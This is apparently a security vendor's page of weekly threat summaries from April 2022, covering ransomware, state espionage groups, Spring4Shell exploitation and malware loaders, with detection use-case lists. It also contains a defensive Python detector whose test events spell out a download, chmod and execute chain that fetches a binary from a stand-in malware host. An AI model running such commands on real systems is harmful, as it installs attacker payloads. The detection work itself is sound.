The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks: we help your team look for malicious exploit strings and run exposure checks on your endpoint devices and servers, which can identify a successful payload delivery and compromise through a given vulnerability.

Intelligence Levels

  • Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
  • Strategic: General information security news, for awareness

About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our craft are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports, hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles

Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic and content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us; we’re happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform

MetaStealer Malware

April 19, 2022

A new information-stealing malware, META, has been gaining popularity among cybercriminals. Research from SANS and BleepingComputer indicates the malware has been distributed through malspam campaigns.

Potential Attack on Indian Electricity Grid by RedEcho

April 12, 2022

Industry: Critical Infrastructure | Level: Strategic | Source: RecordedFuture

Activity tracked by Recorded Future suggests a cyberattack was initiated by the Chinese state-sponsored threat group RedEcho, targeting India’s power grid. The attacks specifically targeted seven State Load Despatch Centres (SLDCs) in North India, to disrupt the flow and dispatch of electricity. Geographically, the activity is near the border of Ladakh, an area of border conflict between India and China. An assessment from Recorded Future’s director Jonathan Condra offers the following on the intrusion activity: “We believe that the targeting of the Indian power sector is likely for prepositioning purposes or intelligence collection with an eye towards having the capability to disrupt the Indian power sector in the event of kinetic conflict between China and India, and/or for signaling purposes to India – showcasing a capability for deterrence purposes. The targeting of the emergency system may be motivated by more traditional intelligence collection goals, but we cannot confirm at this time.”

ALPHV Ransomware Hits North Carolina A&T University

April 12, 2022

Industry: Education | Level: Strategic | Source: TheRecord

ALPHV/Blackcat ransomware has compromised North Carolina A&T University, and the institution has appeared on the ransomware group’s victim site. The attack appears to have occurred between March 7th and 11th, taking advantage of the reduced staffing during the university’s spring break vacation. As reported by The Record, the attack inhibited network communications including “wireless connections, Blackboard instruction, single sign-on websites, VPN, Jabber, Qualtrics, Banner Document Management and Chrome River. Some of the services are still down.” In addition, personal information was also compromised, including social security numbers, financial data, and SQL and email database information. The university is still recovering from the attack, with services slowly being restored; however, the impact has affected students, some of whom are unable to complete class assignments or participate in class, with sessions being canceled due to the ongoing issues.

Nordex Group’s Cyber Attack

April 12, 2022

Industry: Manufacturing | Level: Strategic | Source: Nordex

The Nordex Group, a wind turbine manufacturer headquartered in Germany, suffered a cyberattack on March 31st, 2022, resulting in the “precautionary” shutdown of its IT systems in various locations. The company maintains factories in Germany, China, Mexico, the United States, Brazil, Spain and India, with no details given on the locations impacted. The company’s press statement says the intrusion activity was in the “early stage,” adding that its incident response procedures were executed immediately: “The incident response team of internal and external security experts has been set up immediately in order to contain the issue and prevent further propagation and to assess the extent of potential exposure.” Nordex Group has not released any additional updates regarding the incident.

Lambda Malware, Denonia

April 12, 2022

Cado Security reports on Denonia, a new malware identified as targeting AWS Lambda to deploy cryptominers. The malware’s dependence on Lambda was observed during dynamic analysis: when its execution failed, it prompted for AWS Lambda environment variables.

Spring Exploits

April 12, 2022

Industry: N/A | Level: Tactical | Source: Trend Micro

Trend Micro research has tracked exploitation of Spring Core (CVE-2022-22965/Spring4Shell) and Spring Cloud Function (CVE-2022-22963) leading to the installation of Mirai malware. The earliest exploitation attempts tracked by the security firm were in the Singapore region. Threat actors exploiting the vulnerabilities were able to upload a webshell that downloads the Mirai botnet malware; the downloaded file’s permissions are then changed with chmod and it is executed. Lastly, a shell script downloads binaries from an attacker-owned server to install Mirai samples built for different CPU architectures onto the victim host.

  • Anvilogic Scenario: Unix File Download, Modified, Executed
  • Anvilogic Use Cases:
    • Spring4Shell – CVE-2022-22965
    • Spring-Cloud-Function – CVE-2022-22963
    • Potential Web Shell
    • File Download (Unix)
    • File Modified for Execution
    • File Execution (Unix)
    • Rare shell script execution
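One way to turn the “Unix File Download, Modified, Executed” scenario above into code, as an added example that is not Anvilogic’s or Trend Micro’s detection logic: three atomic identifiers (a download with curl/wget, a chmod that grants execute, and execution by path) are matched on process-creation events and correlated per host and file path, in order, within a time window. The hostnames, commands and paths in EVENTS are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (host, UTC timestamp, command line); not telemetry from the report.
EVENTS = [
    ("web01", "2022-04-01T10:00:01", "curl -s http://malware.invalid/x86 -o /tmp/x86"),
    ("web01", "2022-04-01T10:00:03", "chmod 777 /tmp/x86"),
    ("web01", "2022-04-01T10:00:04", "/tmp/x86 spring"),
    ("web02", "2022-04-01T11:00:00", "wget -O /opt/app/release.tar http://repo.internal/release.tar"),
    ("web02", "2022-04-01T11:00:05", "tar -xf /opt/app/release.tar"),
    ("web04", "2022-04-01T13:00:00", "curl -o /opt/tools/agent https://vendor.internal/agent"),
    ("web04", "2022-04-01T13:30:00", "chmod 755 /opt/tools/agent"),
    ("web04", "2022-04-01T13:30:01", "/opt/tools/agent --install"),
]

DOWNLOAD = re.compile(r"^(?:curl|wget)\b.*?\s(?:-o|-O|--output)\s+(\S+)")  # explicit output path only
CHMOD = re.compile(r"^chmod\s+(\S+)\s+(\S+)$")

def grants_execute(mode):
    """True if a chmod mode adds an execute bit: symbolic '+x' forms or octal with any x bit set."""
    if "+" in mode:
        return "x" in mode.split("+", 1)[1]
    return mode.isdigit() and len(mode) in (3, 4) and any(int(d) & 1 for d in mode[-3:])

def threat_identifier(cmd):
    """Map one command line to an atomic identifier and the file path it concerns, or None."""
    if m := DOWNLOAD.match(cmd):
        return "File Download (Unix)", m.group(1)
    if (m := CHMOD.match(cmd)) and grants_execute(m.group(1)):
        return "File Modified for Execution", m.group(2)
    if cmd.strip() and "/" in (first := cmd.split()[0]):  # run by path, e.g. /tmp/x86 or ./x86
        return "File Execution (Unix)", first
    return None

def detect_download_modify_execute(events, window_minutes=10):
    """Scenario: same host, same path downloaded, made executable and run, in order, within the window."""
    seen, alerts = {}, []  # (host, path) -> {identifier: timestamp}
    for host, ts, cmd in sorted(events, key=lambda e: e[1]):
        hit = threat_identifier(cmd)
        if hit is None:
            continue
        ident, path = hit
        stages = seen.setdefault((host, path), {})
        stages[ident] = t = datetime.fromisoformat(ts)
        if ident == "File Execution (Unix)":
            dl, mod = stages.get("File Download (Unix)"), stages.get("File Modified for Execution")
            if dl and mod and dl <= mod <= t and t - dl <= timedelta(minutes=window_minutes):
                alerts.append((host, path))
    return alerts
```

Only web01 fires with the default window; the web04 chain is the same three identifiers spread over thirty minutes, which shows why the window size is a tuning decision rather than a fixed rule.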

Mandiant’s Research of FIN7

April 12, 2022

Industry: Financial Services, Food, Medical, Technology, Transportation, Utilities | Level: Tactical | Source: Mandiant

Mandiant provided updated research tracking the evolution of threat activity from the threat group FIN7 between late 2021 and early 2022. The threat group has many associations and overlaps with ransomware operations including Maze, Darkside, Blackmatter and ALPHV/Blackcat. Mandiant adds that activity linking FIN7 and ransomware is identified through “Data theft extortion or ransomware deployment following FIN7-attributed activity at multiple organizations, as well as technical overlaps, suggests that FIN7 actors have been associated with various ransomware operations over time.” A variety of industries are targeted by FIN7, including financial services, food, medical, technology, transportation, and utilities. Activity associated with FIN7 is abundant, and Mandiant has been tracking multiple UNCs (uncategorized threat groups) that appear to be affiliated with FIN7. The threat group has continuously refined its arsenal; for example, its PowerShell backdoor PowerPlant has gone through multiple iterations since 2022 and has been observed more frequently in newer intrusions than older malware such as LOADOUT and GRIFFON.

  • Anvilogic Use Cases:
    • Suspicious Executable by CMD.exe
    • Windows Admin$ Share Access
    • Windows Service Created
    • Executable Process from Suspicious Folder
    • Common Reconnaissance Commands
    • RDP Connection
    • RDP Logon/Logoff Event
    • Rundll32 Command Line
    • Create/Add Local/Domain User
    • Query Registry

APT10/Cicada Espionage Attacks

April 12, 2022

Industry: Government, Legal, Non-Governmental Organizations (NGOs), Pharmaceutical, Religious, Telecommunications | Level: Tactical | Source: Symantec

Symantec has been tracking an espionage campaign spanning several months (earliest sign mid-2021) tied to the Chinese APT group APT10 (aka Cicada, Stone Panda, Potassium, Bronze Riverside, or MenuPass Team). The APT group has previously targeted Japanese-linked companies; however, it has recently expanded its attacks globally, including Europe, Asia, and North America. Entities targeted by the group include government, legal, religious, and non-governmental organizations (NGOs); the current campaign appears to focus on government and NGO entities. Although APT10 previously focused primarily on Japanese companies, only one victim in Japan was identified in the present campaign. Techniques used in the campaign have involved exploiting Microsoft Exchange Servers for initial access, with various tools used during the attack including WinRAR for data archival, Mimikatz, WMIExec, NBTScan, and the group’s custom tool Sodamaster. Sodamaster is capable of evading sandboxes, enumerating the host, and downloading additional payloads.

  • Anvilogic Use Cases:
    • Common Reconnaissance Commands
    • Utility Archive Data
    • Mimikatz
    • Wscript/Cscript Execution
    • WinRM Tools
    • Query Registry

New AsyncRAT & 3LOSH Crypter Malware Campaigns

April 12, 2022

Industry: N/A | Level: Tactical | Source: Cisco Talos

Cisco Talos’s latest research tracking malware distribution campaigns has identified the use of the 3LOSH crypter to obfuscate the deployment of commodity malware including AsyncRAT and LimeRAT. An ISO disk image initiates the infection chain with a VBScript that launches PowerShell to create and execute a series of scripts. Persistence is achieved through a scheduled task created by the PowerShell script. Once the series of .bat and .ps1 scripts has completed, the remote access trojan payload is injected and executed. These 3LOSH crypter campaigns have been observed by Cisco Talos for several months and appear to be increasing in activity, with attackers turning to the 3LOSH crypter to evade detection in corporate environments.

  • Anvilogic Scenario: 3LOSH Crypter – Malware Distribution Campaigns
  • Anvilogic Use Cases:
    • Wscript/Cscript Execution
    • Suspicious Executable by CMD.exe
    • Download exe|msi|bat Proxy
    • Rare remote thread
    • Create/Modify Schtasks

Colibri Loader

April 12, 2022

Malwarebytes provided analysis of Colibri Loader, a malware that emerged on underground forums in August 2021. The malware is advertised to “people who have large volumes of traffic and lack of time to work out the material.”